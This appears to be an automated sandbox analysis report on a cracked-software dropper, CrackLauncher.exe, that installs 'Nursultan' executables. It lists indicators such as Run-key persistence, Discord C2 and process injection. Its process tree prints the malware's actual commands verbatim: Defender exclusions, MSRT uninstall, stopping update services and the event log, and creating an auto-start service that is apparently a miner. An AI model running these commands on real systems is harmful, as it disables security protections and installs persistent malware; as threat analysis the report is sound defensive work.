Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 38 IoCs

Web Service

T1102

flow	ioc
16	discord.com
70	discord.com
145	discord.com
154	discord.com
86	discord.com
94	discord.com
111	discord.com
120	discord.com
162	discord.com
104	discord.com
119	discord.com
8	discord.com
15	discord.com
34	discord.com
44	discord.com
51	discord.com
52	discord.com
128	discord.com
129	discord.com
35	discord.com
78	discord.com
93	discord.com
26	discord.com
61	discord.com
77	discord.com
163	discord.com
59	discord.com
103	discord.com
137	discord.com
69	discord.com
85	discord.com
136	discord.com
155	discord.com
9	discord.com
27	discord.com
43	discord.com
112	discord.com
146	discord.com

Looks up external IP address via web service 19 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com
74	ip-api.com
125	ip-api.com
66	ip-api.com
91	ip-api.com
160	ip-api.com
109	ip-api.com
143	ip-api.com
152	ip-api.com
6	ip-api.com
83	ip-api.com
101	ip-api.com
49	ip-api.com
57	ip-api.com
117	ip-api.com
134	ip-api.com
24	ip-api.com
32	ip-api.com
40	ip-api.com

Power Settings 1 TTPs 56 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
692	powercfg.exe
1648	powercfg.exe
1616	powercfg.exe
2008	powercfg.exe
3020	powercfg.exe
352	powercfg.exe
1652	powercfg.exe
1564	powercfg.exe
692	powercfg.exe
2484	powercfg.exe
2228	powercfg.exe
2304	powercfg.exe
2680	powercfg.exe
2092	powercfg.exe
532	powercfg.exe
548	powercfg.exe
2788	powercfg.exe
1872	powercfg.exe
2756	powercfg.exe
2564	powercfg.exe
2476	powercfg.exe
1644	powercfg.exe
824	powercfg.exe
2292	powercfg.exe
2912	powercfg.exe
2012	powercfg.exe
2584	powercfg.exe
1528	powercfg.exe
1872	powercfg.exe
1992	powercfg.exe
2808	powercfg.exe
1528	powercfg.exe
2732	powercfg.exe
2684	powercfg.exe
2584	powercfg.exe
1288	powercfg.exe
828	powercfg.exe
2500	powercfg.exe
824	powercfg.exe
1536	powercfg.exe
844	powercfg.exe
1620	powercfg.exe
2228	powercfg.exe
2292	powercfg.exe
2464	powercfg.exe
1608	powercfg.exe
2068	powercfg.exe
2388	powercfg.exe
1708	powercfg.exe
2916	powercfg.exe
1288	powercfg.exe
2844	powercfg.exe
2484	powercfg.exe
2212	powercfg.exe
2476	powercfg.exe
1600	powercfg.exe

Drops file in System32 directory 24 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 38 IoCs

description	pid	Process	procid_target
PID 1252 set thread context of 2816	1252	Nursultan.exe	38
PID 1992 set thread context of 2160	1992	Nursultan.exe	59
PID 2732 set thread context of 1856	2732	Nursultan.exe	94
PID 2688 set thread context of 1860	2688	Nursultan.exe	115
PID 2704 set thread context of 744	2704	Nursultan.exe	143
PID 1728 set thread context of 832	1728	jqvljmboayxs.exe	195
PID 1728 set thread context of 772	1728	jqvljmboayxs.exe	200
PID 2804 set thread context of 2200	2804	Nursultan.exe	216
PID 2256 set thread context of 2748	2256	Nursultan.exe	247
PID 444 set thread context of 2728	444	Nursultan.exe	268
PID 3020 set thread context of 2020	3020	Nursultan.exe	292
PID 332 set thread context of 2828	332	Nursultan.exe	311
PID 2152 set thread context of 1588	2152	Nursultan.exe	380
PID 3036 set thread context of 2744	3036	Nursultan.exe	399
PID 2880 set thread context of 2912	2880	Nursultan.exe	420
PID 1748 set thread context of 1244	1748	Nursultan.exe	446
PID 2912 set thread context of 2632	2912	Nursultan.exe	467
PID 2712 set thread context of 2512	2712	Nursultan.exe	493
PID 1600 set thread context of 1956	1600	Nursultan.exe	512
PID 1672 set thread context of 1144	1672	Nursultan.exe	571
PID 2240 set thread context of 2452	2240	Nursultan.exe	609
PID 1080 set thread context of 484	1080	Nursultan.exe	633
PID 1928 set thread context of 860	1928	Nursultan.exe	654
PID 2008 set thread context of 1768	2008	Nursultan.exe	678
PID 2688 set thread context of 2084	2688	Nursultan.exe	786
PID 2844 set thread context of 1932	2844	Nursultan.exe	762
PID 1036 set thread context of 2032	1036	Nursultan.exe	795
PID 920 set thread context of 2412	920	Nursultan.exe	821
PID 2892 set thread context of 2668	2892	Nursultan.exe	919
PID 1328 set thread context of 872	1328	Nursultan.exe	866
PID 2956 set thread context of 1328	2956	Nursultan.exe	889
PID 1768 set thread context of 1188	1768	Nursultan.exe	962
PID 1472 set thread context of 1588	1472	Nursultan.exe	1080
PID 1572 set thread context of 1568	1572	Nursultan.exe	1041
PID 2208 set thread context of 2204	2208	Nursultan.exe	1085
PID 824 set thread context of 1280	824	Nursultan.exe	1058
PID 764 set thread context of 2392	764	Nursultan.exe	1124
PID 1772 set thread context of 1436	1772	Nursultan.exe	1148

Drops file in Windows directory 12 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
844	sc.exe
2548	sc.exe
1820	sc.exe
3064	sc.exe
2008	sc.exe
320	sc.exe
1100	sc.exe
1520	sc.exe
1524	sc.exe
1720	sc.exe
2012	sc.exe
2920	sc.exe
3000	sc.exe
1544	sc.exe
1336	sc.exe
1184	sc.exe
3056	sc.exe
1524	sc.exe
2252	sc.exe
2132	sc.exe
2696	sc.exe
2848	sc.exe
2660	sc.exe
764	sc.exe
2992	sc.exe
1244	sc.exe
284	sc.exe
2332	sc.exe
2020	sc.exe
2876	sc.exe
2432	sc.exe
2540	sc.exe
1096	sc.exe
804	sc.exe
1036	sc.exe
2248	sc.exe
2292	sc.exe
2600	sc.exe
1508	sc.exe
2768	sc.exe
1676	sc.exe
748	sc.exe
1512	sc.exe
1528	sc.exe
2528	sc.exe
2660	sc.exe
2536	sc.exe
2168	sc.exe
2828	sc.exe
2408	sc.exe
1496	sc.exe
2564	sc.exe
2552	sc.exe
1756	sc.exe
2288	sc.exe
2968	sc.exe
1288	sc.exe
2668	sc.exe
1932	sc.exe
1600	sc.exe
748	sc.exe
2928	sc.exe
2160	sc.exe
2416	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 19 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2340	wmic.exe
2388	wmic.exe
2672	wmic.exe
1216	wmic.exe
1184	wmic.exe
2020	wmic.exe
2976	wmic.exe
1972	wmic.exe
2464	wmic.exe
2668	wmic.exe
2236	wmic.exe
1640	wmic.exe
676	wmic.exe
2304	wmic.exe
1184	wmic.exe
1504	wmic.exe
824	wmic.exe
1932	wmic.exe
2768	wmic.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 40c81c4c2ecada01	powershell.exe

Runs ping.exe 1 TTPs 19 IoCs

Remote System Discovery

T1018

pid	Process
2732	PING.EXE
1980	PING.EXE
1756	PING.EXE
1744	PING.EXE
1280	PING.EXE
1568	PING.EXE
2900	PING.EXE
1928	PING.EXE
2256	PING.EXE
1748	PING.EXE
2424	PING.EXE
2212	PING.EXE
1508	PING.EXE
1908	PING.EXE
1568	PING.EXE
1644	PING.EXE
2884	PING.EXE
2672	PING.EXE
804	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
544	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1912	powershell.exe
2700	powershell.exe
2536	powershell.exe
1920	powershell.exe
1520	powershell.exe
2012	powershell.exe
320	powershell.exe
1464	powershell.exe
1056	powershell.exe
2092	powershell.exe
2364	powershell.exe
2504	powershell.exe
2068	powershell.exe
1996	powershell.exe
1632	powershell.exe
2592	powershell.exe
764	powershell.exe
1124	powershell.exe
2732	Nursultan.exe
2732	Nursultan.exe
2732	Nursultan.exe
2732	Nursultan.exe
2816	MSBuild.exe
2604	powershell.exe
236	powershell.exe
2728	powershell.exe
1244	powershell.exe
2740	powershell.exe
2548	powershell.exe
2392	powershell.exe
2936	powershell.exe
1980	powershell.exe
2636	powershell.exe
2712	Nursultan Setup.exe
2444	powershell.exe
2964	powershell.exe
2712	Nursultan Setup.exe
2712	Nursultan Setup.exe
2712	Nursultan Setup.exe
2712	Nursultan Setup.exe
2712	Nursultan Setup.exe
2712	Nursultan Setup.exe
2712	Nursultan Setup.exe
2712	Nursultan Setup.exe
2712	Nursultan Setup.exe
2712	Nursultan Setup.exe
2712	Nursultan Setup.exe
2712	Nursultan Setup.exe
2712	Nursultan Setup.exe
2712	Nursultan Setup.exe
1728	jqvljmboayxs.exe
2848	powershell.exe
1728	jqvljmboayxs.exe
1728	jqvljmboayxs.exe
1728	jqvljmboayxs.exe
1728	jqvljmboayxs.exe
1728	jqvljmboayxs.exe
1128	powershell.exe
1728	jqvljmboayxs.exe
1728	jqvljmboayxs.exe
1728	jqvljmboayxs.exe
1728	jqvljmboayxs.exe
1728	jqvljmboayxs.exe
1728	jqvljmboayxs.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeDebugPrivilege	2784	Запустить Nursultan.exe
Token: SeDebugPrivilege	2816	MSBuild.exe
Token: SeDebugPrivilege	1920	powershell.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	320	powershell.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	2160	MSBuild.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	2364	powershell.exe
Token: SeIncreaseQuotaPrivilege	2696	wmic.exe
Token: SeSecurityPrivilege	2696	wmic.exe
Token: SeTakeOwnershipPrivilege	2696	wmic.exe
Token: SeLoadDriverPrivilege	2696	wmic.exe
Token: SeSystemProfilePrivilege	2696	wmic.exe
Token: SeSystemtimePrivilege	2696	wmic.exe
Token: SeProfSingleProcessPrivilege	2696	wmic.exe
Token: SeIncBasePriorityPrivilege	2696	wmic.exe
Token: SeCreatePagefilePrivilege	2696	wmic.exe
Token: SeBackupPrivilege	2696	wmic.exe
Token: SeRestorePrivilege	2696	wmic.exe
Token: SeShutdownPrivilege	2696	wmic.exe
Token: SeDebugPrivilege	2696	wmic.exe
Token: SeSystemEnvironmentPrivilege	2696	wmic.exe
Token: SeRemoteShutdownPrivilege	2696	wmic.exe
Token: SeUndockPrivilege	2696	wmic.exe
Token: SeManageVolumePrivilege	2696	wmic.exe
Token: 33	2696	wmic.exe
Token: 34	2696	wmic.exe
Token: 35	2696	wmic.exe
Token: SeIncreaseQuotaPrivilege	2696	wmic.exe
Token: SeSecurityPrivilege	2696	wmic.exe
Token: SeTakeOwnershipPrivilege	2696	wmic.exe
Token: SeLoadDriverPrivilege	2696	wmic.exe
Token: SeSystemProfilePrivilege	2696	wmic.exe
Token: SeSystemtimePrivilege	2696	wmic.exe
Token: SeProfSingleProcessPrivilege	2696	wmic.exe
Token: SeIncBasePriorityPrivilege	2696	wmic.exe
Token: SeCreatePagefilePrivilege	2696	wmic.exe
Token: SeBackupPrivilege	2696	wmic.exe
Token: SeRestorePrivilege	2696	wmic.exe
Token: SeShutdownPrivilege	2696	wmic.exe
Token: SeDebugPrivilege	2696	wmic.exe
Token: SeSystemEnvironmentPrivilege	2696	wmic.exe
Token: SeRemoteShutdownPrivilege	2696	wmic.exe
Token: SeUndockPrivilege	2696	wmic.exe
Token: SeManageVolumePrivilege	2696	wmic.exe
Token: 33	2696	wmic.exe
Token: 34	2696	wmic.exe
Token: 35	2696	wmic.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeIncreaseQuotaPrivilege	2548	wmic.exe
Token: SeSecurityPrivilege	2548	wmic.exe
Token: SeTakeOwnershipPrivilege	2548	wmic.exe
Token: SeLoadDriverPrivilege	2548	wmic.exe
Token: SeSystemProfilePrivilege	2548	wmic.exe
Token: SeSystemtimePrivilege	2548	wmic.exe
Token: SeProfSingleProcessPrivilege	2548	wmic.exe
Token: SeIncBasePriorityPrivilege	2548	wmic.exe
Token: SeCreatePagefilePrivilege	2548	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2816	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1960 wrote to memory of 1912	1960	CrackLauncher.exe	28
PID 1960 wrote to memory of 1912	1960	CrackLauncher.exe	28
PID 1960 wrote to memory of 1912	1960	CrackLauncher.exe	28
PID 1960 wrote to memory of 2712	1960	CrackLauncher.exe	30
PID 1960 wrote to memory of 2712	1960	CrackLauncher.exe	30
PID 1960 wrote to memory of 2712	1960	CrackLauncher.exe	30
PID 1960 wrote to memory of 2700	1960	CrackLauncher.exe	31
PID 1960 wrote to memory of 2700	1960	CrackLauncher.exe	31
PID 1960 wrote to memory of 2700	1960	CrackLauncher.exe	31
PID 1960 wrote to memory of 2784	1960	CrackLauncher.exe	33
PID 1960 wrote to memory of 2784	1960	CrackLauncher.exe	33
PID 1960 wrote to memory of 2784	1960	CrackLauncher.exe	33
PID 1960 wrote to memory of 2536	1960	CrackLauncher.exe	34
PID 1960 wrote to memory of 2536	1960	CrackLauncher.exe	34
PID 1960 wrote to memory of 2536	1960	CrackLauncher.exe	34
PID 1960 wrote to memory of 1252	1960	CrackLauncher.exe	36
PID 1960 wrote to memory of 1252	1960	CrackLauncher.exe	36
PID 1960 wrote to memory of 1252	1960	CrackLauncher.exe	36
PID 1960 wrote to memory of 1252	1960	CrackLauncher.exe	36
PID 1960 wrote to memory of 2556	1960	CrackLauncher.exe	37
PID 1960 wrote to memory of 2556	1960	CrackLauncher.exe	37
PID 1960 wrote to memory of 2556	1960	CrackLauncher.exe	37
PID 1252 wrote to memory of 2816	1252	Nursultan.exe	38
PID 1252 wrote to memory of 2816	1252	Nursultan.exe	38
PID 1252 wrote to memory of 2816	1252	Nursultan.exe	38
PID 1252 wrote to memory of 2816	1252	Nursultan.exe	38
PID 1252 wrote to memory of 2816	1252	Nursultan.exe	38
PID 1252 wrote to memory of 2816	1252	Nursultan.exe	38
PID 1252 wrote to memory of 2816	1252	Nursultan.exe	38
PID 1252 wrote to memory of 2816	1252	Nursultan.exe	38
PID 1252 wrote to memory of 2816	1252	Nursultan.exe	38
PID 2556 wrote to memory of 1920	2556	CrackLauncher.exe	39
PID 2556 wrote to memory of 1920	2556	CrackLauncher.exe	39
PID 2556 wrote to memory of 1920	2556	CrackLauncher.exe	39
PID 2784 wrote to memory of 2200	2784	Запустить Nursultan.exe	41
PID 2784 wrote to memory of 2200	2784	Запустить Nursultan.exe	41
PID 2784 wrote to memory of 2200	2784	Запустить Nursultan.exe	41
PID 2784 wrote to memory of 1520	2784	Запустить Nursultan.exe	43
PID 2784 wrote to memory of 1520	2784	Запустить Nursultan.exe	43
PID 2784 wrote to memory of 1520	2784	Запустить Nursultan.exe	43
PID 2556 wrote to memory of 844	2556	CrackLauncher.exe	45
PID 2556 wrote to memory of 844	2556	CrackLauncher.exe	45
PID 2556 wrote to memory of 844	2556	CrackLauncher.exe	45
PID 2556 wrote to memory of 2012	2556	CrackLauncher.exe	46
PID 2556 wrote to memory of 2012	2556	CrackLauncher.exe	46
PID 2556 wrote to memory of 2012	2556	CrackLauncher.exe	46
PID 2784 wrote to memory of 320	2784	Запустить Nursultan.exe	48
PID 2784 wrote to memory of 320	2784	Запустить Nursultan.exe	48
PID 2784 wrote to memory of 320	2784	Запустить Nursultan.exe	48
PID 2556 wrote to memory of 1640	2556	CrackLauncher.exe	50
PID 2556 wrote to memory of 1640	2556	CrackLauncher.exe	50
PID 2556 wrote to memory of 1640	2556	CrackLauncher.exe	50
PID 2556 wrote to memory of 1464	2556	CrackLauncher.exe	51
PID 2556 wrote to memory of 1464	2556	CrackLauncher.exe	51
PID 2556 wrote to memory of 1464	2556	CrackLauncher.exe	51
PID 2816 wrote to memory of 2364	2816	MSBuild.exe	53
PID 2816 wrote to memory of 2364	2816	MSBuild.exe	53
PID 2816 wrote to memory of 2364	2816	MSBuild.exe	53
PID 2816 wrote to memory of 2364	2816	MSBuild.exe	53
PID 2556 wrote to memory of 1992	2556	CrackLauncher.exe	55
PID 2556 wrote to memory of 1992	2556	CrackLauncher.exe	55
PID 2556 wrote to memory of 1992	2556	CrackLauncher.exe	55
PID 2556 wrote to memory of 1992	2556	CrackLauncher.exe	55
PID 2556 wrote to memory of 940	2556	CrackLauncher.exe	56

Views/modifies file attributes 1 TTPs 20 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1956	attrib.exe
3060	attrib.exe
2628	attrib.exe
2792	attrib.exe
2792	attrib.exe
980	attrib.exe
976	attrib.exe
1184	attrib.exe
2536	attrib.exe
2200	attrib.exe
2688	attrib.exe
1796	attrib.exe
1908	attrib.exe
2264	attrib.exe
1920	attrib.exe
548	attrib.exe
2848	attrib.exe
2732	attrib.exe
320	attrib.exe
1956	attrib.exe

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1912
- C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2712
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1928
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:2132
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2828
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    PID:844
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2408
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:1544
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2660
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:2292
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:548
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:1288
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:2476
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "XMRKNZQC"
    3⤵
    - Launches sc.exe
    PID:2288
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"
    3⤵
    PID:1580
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1520
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "XMRKNZQC"
    3⤵
    - Launches sc.exe
    PID:2332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
